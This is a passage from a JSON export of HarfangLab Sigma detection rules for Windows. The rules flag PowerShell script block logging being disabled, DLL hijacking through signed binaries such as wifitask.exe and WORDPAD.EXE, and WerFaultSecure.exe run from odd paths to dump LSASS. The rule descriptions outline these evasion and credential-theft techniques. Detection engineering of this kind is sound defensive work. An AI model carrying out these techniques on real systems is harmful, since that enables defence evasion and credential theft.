"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1112_script_block_logging_disabled_registry.yml",
"content": "title: Script Block Logging Disabled in Registry\nid: 191f1aa8-40cc-4b37-b39c-8821d11b97d5\ndescription: |\n Detects the EnableScriptBlockLogging value being set to 0 in registry.\n Attackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\n It is recommended to investigate the process that did this modification, as well as its execution context.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n TargetObject|contains: 'EnableScriptBlockLogging'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_lgpo:\n ProcessImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_nable:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - ProcessImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n\n exclusion_monitoring_agent:\n ProcessImage:\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent GP\\ScriptRunner\\ScriptRunner.exe'\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent\\ScriptRunner\\ScriptRunner.exe'\n\n exclusion_mmc:\n ProcessCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\\\*'\n\n exclusion_checkpoint:\n ProcessImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_windows:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - '?:\\windows\\system32\\deviceenroller.exe'\n - '?:\\windows\\syswow64\\deviceenroller.exe'\n - '?:\\windows\\system32\\omadmclient.exe'\n - '?:\\windows\\syswow64\\omadmclient.exe'\n - '?:\\windows\\system32\\vmms.exe'\n - '?:\\windows\\syswow64\\vmms.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_ishealth:\n ProcessImage:\n - '?:\\Program Files (x86)\\IS-Health\\IS-Health\\IS-Health.exe'\n - '?:\\Program Files\\IS-Health\\IS-Health\\IS-Health.exe'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5",
"rule_name": "Script Block Logging Disabled in Registry",
"rule_description": "Detects the EnableScriptBlockLogging value being set to 0 in registry.\nAttackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\nIt is recommended to investigate the process that did this modification, as well as its execution context.\n",
"rule_creation_date": "2025-08-29",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080714Z",
"creation_date": "2026-03-23T11:45:34.080716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080720Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1477925112561209344",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_format_com.yml",
"content": "title: DLL Hijacking via format.com\nid: 1982114f-b8b0-4ab1-8856-9eb7baf58dd8\ndescription: |\n Detects potential Windows DLL Hijacking via format.com.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1477925112561209344\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/01/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'format.com'\n ProcessSignature: 'Microsoft Windows'\n #ImageLoaded: '*.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8",
"rule_name": "DLL Hijacking via format.com",
"rule_description": "Detects potential Windows DLL Hijacking via format.com.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-01-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "198dc4a0-fad3-4a63-96df-c66da0fff340",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078646Z",
"creation_date": "2026-03-23T11:45:34.078648Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078652Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wifitask.yml",
"content": "title: DLL Hijacking via wifitask.exe\nid: 198dc4a0-fad3-4a63-96df-c66da0fff340\ndescription: |\n Detects potential Windows DLL Hijacking via wifitask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wifitask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\HTTPAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\umpdc.dll'\n - '\\webservices.dll'\n - '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "198dc4a0-fad3-4a63-96df-c66da0fff340",
"rule_name": "DLL Hijacking via wifitask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wifitask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "19d12965-f4b4-469a-b904-87bd6dc211d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595087Z",
"creation_date": "2026-03-23T11:45:34.595091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsrm.yml",
"content": "title: DLL Hijacking via dsr.exe\nid: 19d12965-f4b4-469a-b904-87bd6dc211d8\ndescription: |\n Detects potential Windows DLL Hijacking via dsr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsrm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "19d12965-f4b4-469a-b904-87bd6dc211d8",
"rule_name": "DLL Hijacking via dsr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092694Z",
"creation_date": "2026-03-23T11:45:34.092696Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092701Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recoverydrive.yml",
"content": "title: DLL Hijacking via RECOVERYDRIVE.exe\nid: 1a1f6e7a-2498-43ab-a378-5c398ec012d1\ndescription: |\n Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RECOVERYDRIVE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\reagent.dll'\n - '\\unattend.dll'\n - '\\uxtheme.dll'\n - '\\vssapi.dll'\n - '\\wdscore.dll'\n - '\\wimgapi.dll'\n - '\\winhttp.dll'\n - '\\wofutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1",
"rule_name": "DLL Hijacking via RECOVERYDRIVE.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a5344cf-01b1-4cce-92c3-e46480185079",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086161Z",
"creation_date": "2026-03-23T11:45:34.086163Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086168Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_werfaultsecure_unknown_location.yml",
"content": "title: WerFaultSecure.exe Executed From a Non-Common Location\nid: 1a5344cf-01b1-4cce-92c3-e46480185079\ndescription: |\n Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\n WerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\n Attackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\n It is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2025/09/15\nmodified: 2025/10/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n\n filter_legitimate_folder:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_serviceprotection:\n ParentImage: '?:\\Program Files\\ServiceProtection\\ServiceProtection.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'PHARMADATA PTY LTD'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a5344cf-01b1-4cce-92c3-e46480185079",
"rule_name": "WerFaultSecure.exe Executed From a Non-Common Location",
"rule_description": "Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\nWerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\nAttackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\nIt is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\n",
"rule_creation_date": "2025-09-15",
"rule_modified_date": "2025-10-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586727Z",
"creation_date": "2026-03-23T11:45:34.586731Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586739Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wordpad.yml",
"content": "title: DLL Hijacking via WORDPAD.exe\nid: 1a60aaa8-4707-470a-bfa7-fcd2a9b3c464\ndescription: |\n Detects potential Windows DLL Hijacking via WORDPAD.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WORDPAD.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\msxml3.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\uiribbon.dll'\n - '\\windowscodecs.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464",
"rule_name": "DLL Hijacking via WORDPAD.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WORDPAD.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a6ba792-4593-442a-9a80-d38ce5e97360",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595992Z",
"creation_date": "2026-03-23T11:45:34.595996Z",
"enabled": true,
